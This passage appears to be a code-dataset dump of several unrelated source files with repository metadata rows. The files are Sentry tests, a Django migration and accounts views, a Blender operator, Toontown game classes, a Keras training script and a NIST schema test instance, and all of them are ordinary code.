    @mock.patch('sentry.signals.regression_signal.send')
    def test_broken_regression_signal(self, send):
        send.side_effect = Exception()
        event = Group.objects.from_kwargs(1, message='foo')
        self.assertEquals(event.message, 'foo')
        self.assertEquals(event.project_id, 1)
    def test_invalid_project(self):
        self.assertRaises(Project.DoesNotExist, Group.objects.from_kwargs, 2, message='foo')
    def test_valid_only_message(self):
        event = Group.objects.from_kwargs(1, message='foo')
        self.assertEquals(event.group.last_seen, event.datetime)
        self.assertEquals(event.message, 'foo')
        self.assertEquals(event.project_id, 1)
    def test_valid_timestamp_without_tz(self):
        # TODO: this doesnt error, but it will throw a warning. What should we do?
        with self.Settings(USE_TZ=True):
            date = datetime.datetime.utcnow()
            event = Group.objects.from_kwargs(1, message='foo', timestamp=date)
            self.assertEquals(event.message, 'foo')
            self.assertEquals(event.project_id, 1)
            self.assertEquals(event.datetime, date.replace(tzinfo=timezone.utc))
    # Repeated events with the same URL increment times_seen; a new URL adds
    # a second filter value row.
    def test_url_filter(self):
        event = Group.objects.from_kwargs(1, message='foo')
        group = event.group
        self.assertEquals(group.messagefiltervalue_set.filter(key='url').count(), 0)
        event = Group.objects.from_kwargs(1, message='foo', **{
            'sentry.interfaces.Http': {
                'url': 'http://example.com',
            }
        })
        group = event.group
        self.assertEquals(group.messagefiltervalue_set.filter(key='url').count(), 1)
        res = group.messagefiltervalue_set.filter(key='url').get()
        self.assertEquals(res.value, 'http://example.com')
        self.assertEquals(res.times_seen, 1)
        event = Group.objects.from_kwargs(1, message='foo', **{
            'sentry.interfaces.Http': {
                'url': 'http://example.com',
            }
        })
        group = event.group
        self.assertEquals(group.messagefiltervalue_set.filter(key='url').count(), 1)
        res = group.messagefiltervalue_set.filter(key='url').get()
        self.assertEquals(res.value, 'http://example.com')
        self.assertEquals(res.times_seen, 2)
        event = Group.objects.from_kwargs(1, message='foo', **{
            'sentry.interfaces.Http': {
                'url': 'http://example.com/2',
            }
        })
        group = event.group
        self.assertEquals(group.messagefiltervalue_set.filter(key='url').count(), 2)
        results = list(group.messagefiltervalue_set.filter(key='url').order_by('id'))
        res = results[0]
        self.assertEquals(res.value, 'http://example.com')
        self.assertEquals(res.times_seen, 2)
        res = results[1]
        self.assertEquals(res.value, 'http://example.com/2')
        self.assertEquals(res.times_seen, 1)
    # Same bookkeeping as test_url_filter, but for the server_name tag.
    def test_server_name_filter(self):
        event = Group.objects.from_kwargs(1, message='foo')
        group = event.group
        self.assertEquals(group.messagefiltervalue_set.filter(key='server_name').count(), 0)
        event = Group.objects.from_kwargs(1, message='foo', server_name='foo')
        group = event.group
        self.assertEquals(group.messagefiltervalue_set.filter(key='server_name').count(), 1)
        res = group.messagefiltervalue_set.filter(key='server_name').get()
        self.assertEquals(res.value, 'foo')
        self.assertEquals(res.times_seen, 1)
        event = Group.objects.from_kwargs(1, message='foo', server_name='foo')
        group = event.group
        self.assertEquals(group.messagefiltervalue_set.filter(key='server_name').count(), 1)
        res = group.messagefiltervalue_set.filter(key='server_name').get()
        self.assertEquals(res.value, 'foo')
        self.assertEquals(res.times_seen, 2)
        event = Group.objects.from_kwargs(1, message='foo', server_name='bar')
        group = event.group
        self.assertEquals(group.messagefiltervalue_set.filter(key='server_name').count(), 2)
        results = list(group.messagefiltervalue_set.filter(key='server_name').order_by('id'))
        res = results[0]
        self.assertEquals(res.value, 'foo')
        self.assertEquals(res.times_seen, 2)
        res = results[1]
        self.assertEquals(res.value, 'bar')
        self.assertEquals(res.times_seen, 1)
    # logger/level are always appended to user-supplied tags, in both the
    # list and dict input forms.
    @mock.patch('sentry.manager.send_group_processors', mock.Mock())
    @mock.patch('sentry.manager.GroupManager.add_tags')
    def test_tags_as_list(self, add_tags):
        event = Group.objects.from_kwargs(1, message='foo', tags=[('foo', 'bar')])
        group = event.group
        add_tags.assert_called_once_with(group, [('foo', 'bar'), ('logger', 'root'), ('level', 'error')])
    @mock.patch('sentry.manager.send_group_processors', mock.Mock())
    @mock.patch('sentry.manager.GroupManager.add_tags')
    def test_tags_as_dict(self, add_tags):
        event = Group.objects.from_kwargs(1, message='foo', tags={'foo': 'bar'})
        group = event.group
        add_tags.assert_called_once_with(group, [('foo', 'bar'), ('logger', 'root'), ('level', 'error')])
    @mock.patch('sentry.manager.send_group_processors', mock.Mock())
    def test_platform_is_saved(self):
        event = Group.objects.from_kwargs(1, message='foo', platform='python')
        group = event.group
        self.assertEquals(group.platform, 'python')
        self.assertEquals(event.platform, 'python')
    # A duplicate event_id must be deduplicated, not raise a DB error.
    def test_dupe_message_id(self):
        event = Group.objects.from_kwargs(1, event_id=1, message='foo')
        self.assertEquals(event.message, 'foo')
        self.assertEquals(event.project_id, 1)
        self.assertEquals(Event.objects.count(), 1)
        # ensure that calling it again doesnt raise a db error
        Group.objects.from_kwargs(1, event_id=1, message='foo')
        self.assertEquals(Event.objects.count(), 1)
    def test_does_update_messagecountbyminute(self):
        event = Group.objects.from_kwargs(1, message='foo')
        inst = MessageCountByMinute.objects.filter(group=event.group)
        self.assertTrue(inst.exists())
        inst = inst.get()
        self.assertEquals(inst.times_seen, 1)
        event = Group.objects.from_kwargs(1, message='foo')
        inst = MessageCountByMinute.objects.get(group=event.group)
        self.assertEquals(inst.times_seen, 2)
    def test_does_update_projectcountbyminute(self):
        event = Group.objects.from_kwargs(1, message='foo')
        inst = ProjectCountByMinute.objects.filter(project=event.project)
        self.assertTrue(inst.exists())
        inst = inst.get()
        self.assertEquals(inst.times_seen, 1)
        event = Group.objects.from_kwargs(1, message='foo')
        inst = ProjectCountByMinute.objects.get(project=event.project)
        self.assertEquals(inst.times_seen, 2)
    # A repeated checksum updates the existing group's counters and message.
    def test_updates_group(self):
        Group.objects.from_kwargs(1, message='foo', checksum='a' * 32)
        event = Group.objects.from_kwargs(1, message='foo bar', checksum='a' * 32)
        group = Group.objects.get(pk=event.group_id)
        self.assertEquals(group.times_seen, 2)
        self.assertEquals(group.last_seen.replace(microsecond=0), event.datetime.replace(microsecond=0))
        self.assertEquals(group.message, 'foo bar')
    def test_add_tags(self):
        event = Group.objects.from_kwargs(1, message='rrr')
        group = event.group
        Group.objects.add_tags(group, tags=(('foo', 'bar'), ('foo', 'baz'), ('biz', 'boz')))
        self.assertEquals(group.messagefiltervalue_set.filter(key='foo').count(), 2)
        results = list(group.messagefiltervalue_set.filter(key='foo').order_by('id'))
        res = results[0]
        self.assertEquals(res.value, 'bar')
        self.assertEquals(res.times_seen, 1)
        res = results[1]
        self.assertEquals(res.value, 'baz')
        self.assertEquals(res.times_seen, 1)
        self.assertEquals(group.messagefiltervalue_set.filter(key='biz').count(), 1)
        results = list(group.messagefiltervalue_set.filter(key='biz').order_by('id'))
        res = results[0]
        self.assertEquals(res.value, 'boz')
        self.assertEquals(res.times_seen, 1)
class SearchManagerTest(TestCase):
    """Covers SearchDocument.objects.search over a manually indexed token."""
    def test_search(self):
        project = Project.objects.all()[0]
        group = Group.objects.create(project=project, message='foo', checksum='a' * 32)
        doc = SearchDocument.objects.create(
            project=project,
            group=group,
            status=group.status,
            total_events=1,
            date_added=group.first_seen,
            date_changed=group.last_seen,
        )
        doc.token_set.create(
            field='text',
            token='foo',
        )
        results = list(SearchDocument.objects.search(project, query='foo'))
        self.assertEquals(len(results), 1)
        # This uses a raw query set so we have to check the id
        self.assertEquals(results[0].id, doc.id)
# Trending queries need backend support; skip the class when unavailable.
@pytest.mark.skipif('not has_trending()')
class TrendsTest(TestCase):
    def test_accelerated_works_at_all(self):
        now = timezone.now() - datetime.timedelta(minutes=5)
        project = Project.objects.all()[0]
        group = Group.objects.create(status=0, project=project, message='foo', checksum='a' * 32)
        group2 = Group.objects.create(status=0, project=project, message='foo', checksum='b' * 32)
        MessageCountByMinute.objects.create(project=project, group=group, date=now, times_seen=50)
        MessageCountByMinute.objects.create(project=project, group=group2, date=now, times_seen=40)
        base_qs = Group.objects.filter(
            status=0,
        )
        # Higher times_seen (group) should rank before group2.
        results = list(Group.objects.get_accelerated([project.id], base_qs)[:25])
        self.assertEquals(results, [group, group2])
class GetChecksumFromEventTest(TestCase):
    """Checksum computation must prefer the Stacktrace interface over Http."""
    # Note: decorators apply bottom-up, so http_comp_hash is the first mock arg.
    @mock.patch('sentry.interfaces.Stacktrace.get_composite_hash')
    @mock.patch('sentry.interfaces.Http.get_composite_hash')
    def test_stacktrace_wins_over_http(self, http_comp_hash, stack_comp_hash):
        # this was a regression, and a very important one
        http_comp_hash.return_value = ['baz']
        stack_comp_hash.return_value = ['foo', 'bar']
        event = Event(
            data={
                'sentry.interfaces.Stacktrace': {
                    'frames': [{
                        'lineno': 1,
                        'filename': 'foo.py',
                    }],
                },
                'sentry.interfaces.Http': {
                    'url': 'http://example.com'
                },
            },
            message='Foo bar',
        )
        checksum = get_checksum_from_event(event)
        stack_comp_hash.assert_called_once_with(interfaces=event.interfaces)
        assert not http_comp_hash.called
        # md5 of the joined stacktrace hash components.
        assert checksum == '3858f62230ac3c915f300c664312c63f'
| [
"dcramer@gmail.com"
] | dcramer@gmail.com |
4b4f8b16ed3a3451ce853106c6e8934456e04fb6 | 13c2639490aa8cc3ecf891ae3422f0e105dd886e | /order/migrations/0002_auto_20210317_0002.py | f7c72217f08e89a7ab5b6c86813708d6998f5039 | [] | no_license | maratovision/rest_api | d32fdfc8d5d8968d2c8ef77aaed05b25d6fa26a0 | b734f3cf1c626f4043dbaa0fa7a6f41ebf9cdcae | refs/heads/main | 2023-04-08T12:54:40.736337 | 2021-04-08T20:24:15 | 2021-04-08T20:24:15 | 356,038,311 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 877 | py | # Generated by Django 3.1.7 on 2021-03-16 18:02
from django.db import migrations, models
import django.db.models.deletion
# Auto-generated Django migration: adds the Table model and re-points
# Order.table at it.  Do not edit by hand once applied.
class Migration(migrations.Migration):
    dependencies = [
        ('order', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='Table',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('area', models.CharField(max_length=10)),
                ('status', models.CharField(choices=[('Reserved', 'Reserved'), ('Empty', 'Empty')], default='Empty', max_length=20)),
            ],
        ),
        migrations.AlterField(
            model_name='order',
            name='table',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='order.table'),
        ),
    ]
| [
"maratovision@gmail.com"
] | maratovision@gmail.com |
aa8ca750eff2dc9bc48404571caa906b5e430e8d | ca259c70bd7e565fa45cf7e9597251e7bbd8f240 | /menus/Lighting/ImportRig.py | 8d7f775e12661b27003fe7a168840d311f8ef2ba | [] | no_license | gmolinart/blender_pipeline | 6ecd01e8efa02a2b9b8f68ece3e82a35d899c73c | 1a01d78a697c3fc70e6410b46b5138405d4b542c | refs/heads/master | 2023-04-10T04:17:44.349286 | 2021-04-20T11:14:26 | 2021-04-20T11:14:26 | 304,119,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,490 | py | import bpy
# from cgl.plugins.blender import Alchemy as lm
class ImportRig(bpy.types.Operator):
    """
    This class is required to register a button in blender.
    """
    # Operator identifiers used by Blender's UI/registration machinery.
    bl_idname = 'object.import_rig'
    bl_label = 'Import Rig'
    @classmethod
    def poll(cls, context):
        # Only enabled when something is selected/active.
        return context.active_object is not None
    def execute(self, context):
        # Delegates to the module-level run() defined below.
        run()
        return {'FINISHED'}
import bpy
def import_selected_rig():
    """Realize the instanced object behind the selected proxy/rig.

    Returns a ``(imported_rig_name, action_name)`` tuple, or ``None`` when
    the source rig has no animation data (callers must handle that case).
    Raises ValueError if the selected object is neither a proxy nor a rig.
    """
    rig = bpy.context.object
    if 'proxy' in rig.name:
        object_name = rig.name.replace('_proxy', '')
    elif 'rig' in rig.name:
        object_name = rig.name.replace('_rig', '')
    else:
        # Previously this path left ``object_name`` unbound and crashed with
        # a NameError two lines later; fail with a clear message instead.
        raise ValueError('Selected object {!r} is neither a proxy nor a rig'.format(rig.name))
    obj = bpy.data.objects[object_name]  # 'object' shadowed a builtin before
    anim_data = rig.animation_data
    if not anim_data:
        print('NO ANIMATION')
        obj.animation_data_create()
        return None  # explicit: nothing to link without an action
    action = rig.animation_data.action.name
    rig.select_set(False)
    obj.select_set(True)
    bpy.ops.object.duplicates_make_real()
    imported_rig_name = '{}_rig'.format(object_name)
    return (imported_rig_name, action)
def link_animation(object, action):
    """Attach the action named *action* to the object named *object*."""
    target = bpy.data.objects[object]
    target.animation_data_create()
    target.animation_data.action = bpy.data.actions[action]
def run():
    """Import the rig behind the selected proxy and link its action to it."""
    result = import_selected_rig()
    if result is None:
        # Source rig has no animation; unpacking None used to raise TypeError.
        return
    rig_name, action_name = result
    print(rig_name, action_name)
    # The original called link_animation twice with identical arguments;
    # the second call only re-assigned the same action, so it was dropped.
    link_animation(rig_name, action_name)
"gmolinart@gmail.com"
] | gmolinart@gmail.com |
7daec122740e4dd33b266b8e1ae3a1bb2cf663de | a857d1911a118b8aa62ffeaa8f154c8325cdc939 | /toontown/minigame/DivingTreasure.py | fbb219a4caf3e31d142fc374c0c2f6bb0918ff6b | [
"MIT"
] | permissive | DioExtreme/TT-CL-Edition | 761d3463c829ec51f6bd2818a28b667c670c44b6 | 6b85ca8352a57e11f89337e1c381754d45af02ea | refs/heads/main | 2023-06-01T16:37:49.924935 | 2021-06-24T02:25:22 | 2021-06-24T02:25:22 | 379,310,849 | 0 | 0 | MIT | 2021-06-22T15:07:31 | 2021-06-22T15:07:30 | null | UTF-8 | Python | false | false | 1,336 | py | from direct.showbase.DirectObject import DirectObject
from toontown.toonbase.ToontownGlobals import *
from direct.directnotify import DirectNotifyGlobal
from direct.interval.IntervalGlobal import *
import DivingGameGlobals
class DivingTreasure(DirectObject):
    # A treasure chest in the diving minigame: visual model plus a sphere
    # collider.  Relies on Panda3D globals ``render`` and ``loader``.
    def __init__(self, i):
        # i is the chest index; it determines the X position and names the
        # collision node (so collision events identify which chest was hit).
        self.treasureNode = render.attachNewNode('treasure')
        loadBase = 'phase_4/models/minigames/'
        self.chest = loader.loadModel(loadBase + 'treasure.bam')
        self.chest.reparentTo(self.treasureNode)
        self.chest.setPos(0, 0, -25)
        self.chest.setScale(1, 0.7, 1)
        self.chestId = i
        self.grabbedId = 0
        self.moveLerp = Sequence()
        self.treasureNode.setScale(0.04)
        # Chests are spaced 10 units apart along X, starting at -15.
        self.treasureNode.setPos(-15 + 10.0 * i, 0.25, -36.0)
        # Intangible sphere so toons pass through while still triggering events.
        cSphere = CollisionSphere(0.0, 0.0, 0.0, 45)
        cSphere.setTangible(0)
        name = str(i)
        cSphereNode = CollisionNode(name)
        cSphereNode.setIntoCollideMask(DivingGameGlobals.CollideMask)
        cSphereNode.addSolid(cSphere)
        self.chestNode = cSphereNode
        self.chestCNP = self.treasureNode.attachNewNode(cSphereNode)
    def destroy(self):
        # Tear down event hooks, running intervals, and scene-graph nodes.
        self.ignoreAll()
        del self.chest
        self.moveLerp.finish()
        del self.moveLerp
        self.treasureNode.removeNode()
        del self.treasureNode
| [
"devinhall4@gmail.com"
] | devinhall4@gmail.com |
7fb4bde6fd28390cdae70c8247ed6a32b2200435 | a4da4b0bee0a6ff500283964f506b578de3701c6 | /mva/scripts/dnn_resweights.py | 0a023e653d56d116acf1b45904cba9b5fafd4fea | [] | no_license | kondratyevd/H2MuPurdue | 4ac012562c02acad6751a1e1ecb6fa1c46d832f5 | 2c0632ecf083840743ee6d652bb31e4ddde101e2 | refs/heads/master | 2020-05-14T19:16:46.489982 | 2019-08-25T21:03:17 | 2019-08-25T21:03:17 | 181,926,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,051 | py | import os, sys
sys.path.append( os.path.dirname( os.path.dirname( os.path.abspath(__file__) ) ) )
import argparse
from classifier import Framework
from samples.ntuples import *
# Python 2 training script: configures the H2Mu MVA Framework with UCSD
# inclusive ntuples (2016-2018) and trains a multiclass Keras DNN.
parser = argparse.ArgumentParser(description='')
parser.add_argument('--out_path', action='store', dest='output_path', help='Output path')
args = parser.parse_args()
c = Framework(outPath=args.output_path)
c.label = "dnn_resweights"
comment = "DNN UCSD resweights"
# change this line for each run
c.add_comment(comment)
print comment
treePath = 'tree'
c.set_tree_path(treePath)
c.set_year("ucsd_inclusive")
c.massWindow = [120,130]
c.multiclass = True
# Category labels: signals (ggH, VBF) and backgrounds (DY, ttbar).
c.dy_label = "DY"
c.top_label = "ttbar"
c.ggh_label = "ggH"
c.vbf_label = "VBF"
##################### Input samples #######################
c.add_category(c.ggh_label, True)
c.add_file_to_category(ucsd_ggh_2016.name, ucsd_ggh_2016.path, ucsd_ggh_2016.xSec, c.ggh_label, False)
c.add_file_to_category(ucsd_ggh_2017.name, ucsd_ggh_2017.path, ucsd_ggh_2017.xSec, c.ggh_label, False)
c.add_file_to_category(ucsd_ggh_2018.name, ucsd_ggh_2018.path, ucsd_ggh_2018.xSec, c.ggh_label, False)
c.add_category(c.vbf_label, True)
c.add_file_to_category(ucsd_vbf_2016.name, ucsd_vbf_2016.path, ucsd_vbf_2016.xSec, c.vbf_label, False)
c.add_file_to_category(ucsd_vbf_2017.name, ucsd_vbf_2017.path, ucsd_vbf_2017.xSec, c.vbf_label, False)
c.add_file_to_category(ucsd_vbf_2018.name, ucsd_vbf_2018.path, ucsd_vbf_2018.xSec, c.vbf_label, False)
c.add_category(c.dy_label, False)
c.add_file_to_category(ucsd_dy_2016.name, ucsd_dy_2016.path, ucsd_dy_2016.xSec, c.dy_label, False)
c.add_file_to_category(ucsd_dy_2017.name, ucsd_dy_2017.path, ucsd_dy_2017.xSec, c.dy_label, False)
c.add_file_to_category(ucsd_dy_2018.name, ucsd_dy_2018.path, ucsd_dy_2018.xSec, c.dy_label, False)
c.add_category(c.top_label, False)
c.add_file_to_category(ucsd_top_2016.name, ucsd_top_2016.path, ucsd_top_2016.xSec, c.top_label, False)
c.add_file_to_category(ucsd_top_2017.name, ucsd_top_2017.path, ucsd_top_2017.xSec, c.top_label, False)
c.add_file_to_category(ucsd_top_2018.name, ucsd_top_2018.path, ucsd_top_2018.xSec, c.top_label, False)
##########################################################
### ------ Raffaele's variables ------ ###
c.add_variable("hmmpt")
c.add_variable("hmmrap")
c.add_variable("hmmthetacs")
c.add_variable("hmmphics")
c.add_variable("met")
c.add_variable("m1ptOverMass")
c.add_variable("m2ptOverMass")
c.add_variable('m1eta')
c.add_variable('m2eta')
c.add_variable("njets")
c.add_variable("nbjets")
c.add_variable("zepen")
c.add_variable("j1pt")
c.add_variable("j2pt")
c.add_variable("j1eta")
c.add_variable("mjj")
c.add_variable("detajj")
c.add_variable("dphijj")
###############################################
# Spectators are carried through but not used as training inputs.
c.add_spectator('hmass')
c.add_spectator('hmerr')
c.add_spectator('weight')
c.weigh_by_event(True)
c.add_package("Keras")
c.add_method("model_resweights") # Dropout 0.2
c.train_methods()
print "Training is done: "
print comment
print "Output saved to:"
print c.outPath
| [
"kondratyev.d.95@gmail.com"
] | kondratyev.d.95@gmail.com |
df5831a71a391f87980328438fe5f86926e0ab15 | 878eecba2d3c6be9df9df0e3d1efb305eb2d7bf5 | /manage.py | 8fe753e6b0606bce8e97835f42364119c428cc9e | [] | no_license | tarunkarmakardev/ModernTools-landing-page | dfa7e3beb162a774495d3483754861ba656a5d50 | ddc811fcb6dcf63ec81d065da2a4e041b94868c0 | refs/heads/master | 2023-01-27T16:02:24.272707 | 2020-12-16T05:18:18 | 2020-12-16T05:18:18 | 321,691,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 672 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Entry point for Django's command-line administrative interface."""
    # Fall back to the project settings module unless one is already set.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'moderntools_proj.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        message = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(message) from exc
    execute_from_command_line(sys.argv)


if __name__ == '__main__':
    main()
| [
"tarun.karmakar.dev@gmail.com"
] | tarun.karmakar.dev@gmail.com |
34a44453130cb2d95cedae4a983ee5c515790b86 | ad13583673551857615498b9605d9dcab63bb2c3 | /output/instances/nistData/list/positiveInteger/Schema+Instance/NISTXML-SV-IV-list-positiveInteger-minLength-1-2.py | 715b946fa5159fb0b19af0b0861cf6fa438d9072 | [
"MIT"
] | permissive | tefra/xsdata-w3c-tests | 397180205a735b06170aa188f1f39451d2089815 | 081d0908382a0e0b29c8ee9caca6f1c0e36dd6db | refs/heads/main | 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 | MIT | 2023-07-25T14:19:04 | 2020-02-10T21:59:47 | Python | UTF-8 | Python | false | false | 527 | py | from output.models.nist_data.list_pkg.positive_integer.schema_instance.nistschema_sv_iv_list_positive_integer_min_length_1_xsd.nistschema_sv_iv_list_positive_integer_min_length_1 import NistschemaSvIvListPositiveIntegerMinLength1
# Generated fixture: a list-of-positiveInteger instance satisfying the
# schema's minLength facet; used to round-trip against the NIST test data.
obj = NistschemaSvIvListPositiveIntegerMinLength1(
    value=[
        955456363348331457,
        957542655657275468,
        957263866322362775,
        921363534435668136,
        976427824647526163,
        941574587237452877,
        976854472611424354,
        956756856825653725,
    ]
)
| [
"tsoulloftas@gmail.com"
] | tsoulloftas@gmail.com |
1c9a374e93179c7fbd847ad7da7bc482836d3182 | 08e2ed7fb3a3080c8cdc46cf7e4cbb2a6e60f90a | /src/game_object/components/glow_component.py | c9dcce079c5157b55879ec2957c6c94e19314bc1 | [] | no_license | thydungeonsean/_rainbowmancer | 1630b60983719dde77cd1dea267dd15dde855c38 | cebaf66f5c69f60f8b6c38492f19b8f1e32f73fe | refs/heads/master | 2021-04-28T07:35:06.183408 | 2018-03-19T19:55:47 | 2018-03-19T19:55:47 | 122,226,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,819 | py | from game_object_component import GameObjectComponent
from src.enum.hues import *
class GlowComponent(GameObjectComponent):
    # Python 2 component driving a pulsing color "glow" for its owner.
    # A tick counter runs a triangle wave over CYCLE frames (rising for the
    # first half, falling for the second) used to blend between two colors.
    CYCLE = 24
    HALF_CYCLE = CYCLE / 2
    def __init__(self, owner, color):
        GameObjectComponent.__init__(self, owner)
        self.color_component = color
        # pol is the wave direction: 1 while rising, -1 while falling.
        self.pol = 1
        self.tick = 0
    def run(self):
        # Advance the wave one frame and request a redraw when the owner's
        # color is affected by the tile it stands on (or it is critical).
        self.tick += 1
        if self.tick >= GlowComponent.CYCLE:
            self.tick = 0
            self.pol = 1
        elif self.tick == GlowComponent.HALF_CYCLE:
            self.pol = -1
        if self.is_boosted or self.is_vulnerable or self.owner.critical:
            self.color_component.request_update()
    @property
    def color_map(self):
        return self.owner.level_map.color_map
    @property
    def is_boosted(self):
        # Standing on a tile of the object's own hue boosts it.
        return self.matches_tile_color()
    @property
    def is_vulnerable(self):
        # Standing on a tile of an opposed hue makes it vulnerable.
        return self.is_opposed_to_tile_color()
    @property
    def pos(self):
        return self.owner.coord.int_position
    def matches_tile_color(self):
        # White-hued objects never count as matching their tile.
        if self.color_component.hue_id != WHITE_HUE:
            return self.color_map.get_tile(self.pos) == self.color_component.hue_id
        else:
            return False
    def is_opposed_to_tile_color(self):
        tile_hue = self.color_map.get_tile(self.pos)
        object_hue = self.color_component.hue_id
        return tile_hue in opposed_hues[object_hue]
    def get_critical_flash(self):
        # Color shown while the owner is critical: pulse from near-black up
        # to the strongest shade of the relevant hue (or grey as a fallback).
        if self.color_component.is_generated:
            bot = LT_BLACK
            top = hue_table[self.color_component.hue_id][max_str]
        elif self.color_map.get_tile(self.pos) not in {WHITE_HUE, DARK_HUE}:
            bot = LT_BLACK
            top = hue_table[self.color_map.get_tile(self.pos)][max_str]
        else:
            bot = PURE_BLACK
            top = GREY_3
        return self.interpolate_colors(bot, top, self.get_progress_percentage())
    def get_boost_flash(self):
        # Color shown while boosted: pulse from the hue's base shade to white.
        if self.color_component.hue_id in strong_colors:
            bot = hue_table[self.color_component.hue_id][max_str]
        else:
            bot = hue_table[self.color_component.hue_id][3]
        top = WHITE
        return self.interpolate_colors(bot, top, self.get_progress_percentage())
    def get_progress_percentage(self):
        # Triangle wave in [0, 1]: rises over the first half cycle, falls
        # symmetrically over the second.
        if self.pol == 1:
            return float(self.tick) / GlowComponent.HALF_CYCLE
        else:
            diff = self.tick - GlowComponent.HALF_CYCLE
            mod = GlowComponent.HALF_CYCLE - diff
            return float(mod) / GlowComponent.HALF_CYCLE
    def interpolate_colors(self, (br, bg, bb), (tr, tg, tb), percent):
        # Linear blend between two RGB triples (Python 2 tuple parameters).
        diff_r = int((tr - br) * percent)
        diff_g = int((tg - bg) * percent)
        diff_b = int((tb - bb) * percent)
        return diff_r + br, diff_g + bg, diff_b + bb
| [
"marzecsean@gmail.com"
] | marzecsean@gmail.com |
42daabc1053796acc91a604a7c3bee3508786c64 | 15302e92957f4824aa37b9ae524f36ca99f74b2e | /accounts/views.py | 7db5acd621b1455666a8b8c2ea6a045899d6faab | [] | no_license | extremesystems/Shakal-NG | 4bc76893d1fd486681b6364d4bb306b02e348ce4 | 40b4f5e70feb3f0f5ef4432b273eb09387232d3d | refs/heads/master | 2020-12-25T10:36:34.227509 | 2013-09-22T12:52:34 | 2013-09-22T12:52:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,262 | py | # -*- coding: utf-8 -*-
from datetime import datetime
from time import mktime
from auth_remember import remember_user
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth.decorators import login_required
from django.contrib.auth.signals import user_logged_in
from django.contrib.auth.views import login as login_view
from django.contrib.sites.models import get_current_site
from django.core import signing
from django.core.mail import send_mail
from django.core.urlresolvers import reverse, reverse_lazy
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404
from django.template import RequestContext
from django.template.loader import render_to_string
from django.template.response import TemplateResponse
from django.utils import timezone
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _, ugettext
from django.views.generic import RedirectView, UpdateView
from forms import ProfileEditForm, EmailChangeForm
def login(*args, **kwargs):
    # Thin passthrough to Django's login view; kept so URLconfs reference a
    # local name that can later be customized.
    return login_view(*args, **kwargs)
def profile(request, pk):
    """Render the public profile page for the user with primary key *pk*."""
    user = get_object_or_404(get_user_model(), pk = pk)
    # Rows of the profile table; 'class' is the CSS class used by the template.
    user_table = (
        {'name': _('user name'), 'value': user.username, 'class': 'nickname'},
        {'name': _('full name'), 'value': user.first_name + ' ' + user.last_name, 'class': 'fn'},
        {'name': _('signature'), 'value': mark_safe(user.signature), 'class': ''},
        {'name': _('linux distribution'), 'value': user.distribution, 'class': 'note'},
        {'name': _('year of birth'), 'value': user.year},
    )
    # Both name parts empty leaves a lone space; blank it out.
    if user_table[1]['value'] == ' ':
        user_table[1]['value'] = ''
    if user.display_mail:
        # Obfuscate the address against naive scrapers ('@' and '.' replaced
        # by translated words).
        email = user.email.replace('@', ' ' + ugettext('ROLLMOP') + ' ').replace('.', ' ' + ugettext('DOT') + ' ')
        user_table = user_table + ({'name': _('e-mail'), 'value': email}, )
    context = {
        'user_table': user_table,
        'user_profile': user,
        'is_my_profile': request.user == user,
    }
    return TemplateResponse(request, "registration/profile.html", RequestContext(request, context))
@login_required
def my_profile(request):
    # Shortcut: show the logged-in user's own profile.
    return profile(request, request.user.pk)
@login_required
def email_change(request):
    """Let the logged-in user request an e-mail change; the new address gets
    a signed confirmation link by mail and is only applied on activation."""
    if request.method == 'GET':
        form = EmailChangeForm(initial = {'email': request.user.email})
    else:
        form = EmailChangeForm(request.POST)
        if form.is_valid():
            if form.cleaned_data['email'] == request.user.email:
                # Unchanged address: nothing to confirm.
                return HttpResponseRedirect(reverse('auth_my_profile'))
            else:
                signer = signing.Signer()
                email = form.cleaned_data['email']
                # Signed payload: "<user_pk>.<unix_timestamp>.<new_email>".
                signed = signer.sign(str(request.user.pk) + '.' + str(int(mktime(timezone.now().timetuple()))) + '.' + email)
                context_data = {
                    'email': signed,
                    'site': get_current_site(request),
                    'activate_link': request.build_absolute_uri(reverse('auth_email_change_activate', args = (signed,))),
                }
                context = RequestContext(request, context_data)
                email_subject = render_to_string("registration/email_change_subject.txt", context).rstrip("\n")
                email_body = render_to_string("registration/email_change.txt", context)
                send_mail(email_subject, email_body, settings.DEFAULT_FROM_EMAIL, [email])
                return HttpResponseRedirect(reverse('auth_email_change_done'))
    return TemplateResponse(request, "registration/email_change_form.html", {'form': form})
@login_required
def email_change_done(request):
    # "Confirmation mail sent" page.
    return TemplateResponse(request, "registration/email_change_done.html")
@login_required
def email_change_activate(request, email):
    """Validate the signed token from the confirmation mail and, if it is
    valid, not expired and unique, apply the new e-mail address."""
    # Errors the user should see a message for (vs. a generic invalid link).
    class UserInputError(ValueError):
        pass
    context = {
        'validlink': True,
    }
    try:
        signer = signing.Signer()
        email_data = signer.unsign(email)
        # Payload format: "<user_pk>.<unix_timestamp>.<new_email>".
        user_id, timestamp, email = email_data.split('.', 2)
        user = get_user_model().objects.get(pk = int(user_id))
        # The link may only be used by the account that requested it.
        if user != request.user:
            raise ValueError
        time = timezone.make_aware(datetime.utcfromtimestamp(int(timestamp)), timezone = timezone.utc)
        if ((timezone.now() - time).days) > 14:
            raise UserInputError(_("Link expired."))
        if get_user_model().objects.filter(email = email).exclude(pk = user.pk).count() > 0:
            raise UserInputError(_("E-mail address is already in use."))
        user.email = email
        user.save()
    except UserInputError as e:
        context['validlink'] = False
        # NOTE(review): ``e.message`` is Python 2 only — use str(e) on Py3.
